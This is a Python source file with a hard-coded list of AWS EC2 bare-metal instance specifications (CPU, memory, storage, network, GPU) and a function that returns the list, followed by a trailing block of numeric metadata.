get = [{'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 4.0, 'DefaultVCpus': 48, 'SizeInMiB': 393216, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'z1d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 4.0}, 'VCpuInfo': {'DefaultVCpus': 48}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 262144, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 262144}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 262144, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 262144}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 524288, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 524288}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 524288, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 524288}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 72, 'SizeInMiB': 524288, 'TotalSizeInGB': 15200, 'Disks': [{'SizeInGB': 1900, 'Count': 8, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 72}, 'MemoryInfo': {'SizeInMiB': 524288}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 15200, 'Disks': [{'SizeInGB': 1900, 'Count': 8, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 96, 'SizeInMiB': 393216, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'Gpus': [{'Name': 'T4', 'Manufacturer': 'NVIDIA', 'Count': 8, 'MemoryInfo': {'SizeInMiB': 16384}}], 'TotalGpuMemoryInMiB': 131072, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'g4dn.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'GpuInfo': {'Gpus': [{'Name': 'T4', 'Manufacturer': 'NVIDIA', 'Count': 8, 'MemoryInfo': {'SizeInMiB': 16384}}], 'TotalGpuMemoryInMiB': 131072}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 786432, 'TotalSizeInGB': 60000, 'Disks': [{'SizeInGB': 7500, 'Count': 8, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3en.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 786432}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 60000, 'Disks': [{'SizeInGB': 7500, 'Count': 8, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 393216, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 393216, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 786432, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 786432}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 786432, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 786432}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}] # noqa: E501
def get_instances_list() -> list:
'''Returns list EC2 instances with BareMetal = True .'''
# pylint: disable=all
return get
| 2,155
| 25,671
| 0.736272
| 1,904
| 25,860
| 9.987395
| 0.068277
| 0.049222
| 0.081405
| 0.098443
| 0.982594
| 0.97013
| 0.969499
| 0.964872
| 0.964872
| 0.948359
| 0
| 0.045612
| 0.070804
| 25,860
| 11
| 25,672
| 2,350.909091
| 0.745766
| 0.004872
| 0
| 0
| 1
| 0
| 0.676839
| 0.267299
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
43d5272215299d8dc0ce8fc8524389ef215e8b88
| 59,228
|
